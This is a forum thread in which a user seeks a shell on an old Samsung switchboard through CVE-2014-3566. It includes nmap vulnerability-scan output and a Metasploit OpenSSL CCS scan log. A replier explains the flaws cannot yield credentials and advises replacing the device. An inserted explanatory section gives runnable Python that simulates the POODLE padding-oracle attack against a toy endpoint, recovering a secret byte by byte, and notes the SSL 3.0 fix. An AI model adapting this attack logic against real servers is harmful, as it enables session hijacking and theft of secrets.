Nasire Posted March 13
Hello everyone, I need help exploiting the CVE-2014-3566 vulnerability. I need someone's help because I have to get into a device whose password we don't know, and it has several vulnerabilities. The one I mentioned is one of them, and I wanted to know if there is any script that can get me a shell or a session so I can change the user's password or create a new one. I hope for your help. Thank you so much. All the best.
dark_pyrro Posted March 13
You have to be more specific. What kind of device? In what way is the CVE relevant to the use case? How do you plan to get a shell on the device in order to change passwords using that CVE? If more vulnerabilities are known, why not list them? Why is the password unknown? Only try to access devices/systems if you have permission to do so.
Nasire Posted March 14
Hi, you're right. My apologies. Well, the device is a Samsung switchboard that is a few years old, and we do not know the password because the old administrator is no longer there, and no matter how hard we try to reset it to factory settings, we have not succeeded. So, with some of my knowledge of nmap, I took a look and discovered that it has vulnerabilities, and I was looking for a way to get into it and reset it. The vulnerabilities that nmap shows me with the vuln script are the following:

```
Nmap scan report for 192.168.x.xx
Host is up (0.0026s latency).
Not shown: 985 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
23/tcp   open  telnet
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
443/tcp  open  https
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       http://www.cvedetails.com/cve/2014-0224
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.2.x/1024-bit MODP group with safe prime modulus
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
5002/tcp open  rfe
5003/tcp open  filemaker
5030/tcp open  surfpass
5100/tcp open  admd
5101/tcp open  admdog
5102/tcp open  admeng
6000/tcp open  X11
6001/tcp open  X11:1
6002/tcp open  X11:2
6100/tcp open  synchronet-db
8500/tcp open  fmtp
```

Let's see if someone can help me with this; otherwise we will have to throw it away, because we need to make changes to it and the technical service asks us for a lot of money, so it would pay off to replace it. Thank you very much for your help. All the best.
dark_pyrro Posted March 14
I can't see that any of those vulns would be of any benefit, since they would just DoS the device or (perhaps) make it possible to decrypt some communications. But then those communications would have to include valid credentials, which I don't think would happen if there's no one trying to communicate with the device using the password (since it's unknown).
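To make the point in the reply above concrete, here is an added simulation of the POODLE (CVE-2014-3566) padding-oracle attack. It is not code from this thread or from any tool mentioned in it. It models the SSL 3.0 record layer (MAC, then pad, then CBC-encrypt, with only the padding-length byte checked) and a man-in-the-middle who moves a ciphertext block into the padding slot and watches whether the server accepts the record. The block cipher is a toy Feistel construction on SHA-256 so the script needs only the standard library (an assumption: real deployments use AES or 3DES, but the attack never depends on the cipher). Note what the attacker has to rely on: `send()` is the victim's client repeatedly transmitting the secret over fresh connections while the attacker controls the surrounding lengths. With no client talking to the device and no known password in flight, there is nothing for the oracle to recover.

```python
import hashlib
import hmac
import random

BLOCK = 16      # CBC block size in bytes
MAC_LEN = 32    # HMAC-SHA256 stands in for SSL 3.0's MAC

# --- Toy 16-byte block cipher: 4-round Feistel, SHA-256 round function ---
# Assumption: this replaces AES so the example runs with the standard library
# only; POODLE attacks the CBC padding check, never the cipher itself.
def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

class Sslv3Endpoint:
    """Simulated SSL 3.0 record layer. SSL 3.0 checks only the last padding
    byte (the length) and ignores the padding content: the POODLE flaw."""

    def __init__(self, secret, seed=0):
        self.rng = random.Random(seed)   # seeded so the run is reproducible
        self.enc_key = self._rand(16)
        self.mac_key = self._rand(16)
        self.secret = secret             # e.g. a session cookie

    def _rand(self, n):
        return bytes(self.rng.getrandbits(8) for _ in range(n))

    def send(self, prefix, suffix):
        """Victim client sends prefix||secret||suffix. The MITM controls the
        lengths of prefix and suffix (URL path, POST body) but not the secret.
        A fresh IV models a fresh connection after each rejected record."""
        data = prefix + self.secret + suffix
        mac = hmac.new(self.mac_key, data, hashlib.sha256).digest()
        padlen = BLOCK - 1 - (len(data) + len(mac)) % BLOCK
        padding = self._rand(padlen) + bytes([padlen])
        iv = self._rand(BLOCK)
        return iv, cbc_encrypt(self.enc_key, iv, data + mac + padding)

    def receive(self, iv, ct):
        """Server side: True if accepted. A wrong padding length shifts the
        MAC and the check fails, so accept/reject is the oracle."""
        pt = cbc_decrypt(self.enc_key, iv, ct)
        padlen = pt[-1]
        if padlen >= BLOCK:
            return False
        body = pt[:-(padlen + 1)]
        data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
        expected = hmac.new(self.mac_key, data, hashlib.sha256).digest()
        return hmac.compare_digest(mac, expected)

def poodle_recover(endpoint, secret_len, max_tries=50000):
    """Recover the secret one byte at a time, about 256 oracle queries per byte."""
    recovered = bytearray()
    for k in range(secret_len):
        # Prefix length puts secret byte k in the last position of a block;
        # suffix length makes data||MAC block-aligned so the padding fills a
        # whole block whose final plaintext byte must decrypt to BLOCK-1.
        p = (BLOCK - 1 - k) % BLOCK
        s = (-(p + secret_len)) % BLOCK
        b = (p + k) // BLOCK                   # index of the target plaintext block
        for _ in range(max_tries):
            iv, ct = endpoint.send(b"A" * p, b"B" * s)
            chain = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
            c_target, c_before_target = chain[b + 1], chain[b]
            c_before_last = chain[-2]
            forged = ct[:-BLOCK] + c_target     # target block into the padding slot
            if endpoint.receive(iv, forged):
                # Accepted => D(C_b)[15] ^ C_{n-1}[15] == 15; the real plaintext
                # byte is D(C_b)[15] ^ C_{b-1}[15].
                recovered.append((BLOCK - 1) ^ c_before_last[-1] ^ c_before_target[-1])
                break
        else:
            raise RuntimeError("oracle never accepted a forged record")
    return bytes(recovered)

if __name__ == "__main__":
    cookie = b"sid=7f3a9c"                     # constructed sample secret
    print(poodle_recover(Sslv3Endpoint(cookie, seed=42), len(cookie)))
```

Every rejected forgery costs the attacker a whole connection, so the attack only works against a client that keeps reconnecting and resending the secret, which is exactly what the reply above says is missing here. The fix on a real server is to disable SSL 3.0 (and, for the related TLS padding issue, prefer AEAD cipher suites).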
Nasire Posted March 14
Hi, the truth is there isn't much to scratch at, especially on a device that cannot be interacted with. With this vulnerability I got this:

CVE-2014-0224

```
auxiliary(scanner/ssl/openssl_ccs) > exploit
[*] 192.168.x.xx:443 - Sending Client Hello...
[*] 192.168.x.xx:443 - Sending CCS...
[!] 192.168.x.xx:443 - Unexpected response.
[*] 192.168.x.xx:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

I don't know if there is any tool that can get a shell or a session out of this. If you have any ideas, I'd appreciate it. I'm also downloading the sifter tool to see if I can get something. Many thanks for everything. All the best.
dark_pyrro Posted March 14
Still, you could probably only hijack an ongoing session, and that would require someone or something to be actively talking to or from the device, and I suspect there's nothing going on there. If you have a device that's relevant for vulns going as far back as the end of the first decade of the millennium, I would really ask myself whether I would want it in my environment. Better to scrap it and get an up-to-date device. Continuing to use it would most likely be a greater risk even if you could access it properly. I would check if the device is still getting updates/upgrades, and if not, just let it meet the inner world of a junk container.
Nasire Posted March 14
Hi, but once I could access it, I would try to update it and also disconnect it from the network, because it is for use with analog phones and doesn't need to be connected to the internet. It would be isolated. Thanks. Regards.
Nasire Posted March 14
Hi dark_pyrro. Can you help me, or do you think it's too complicated?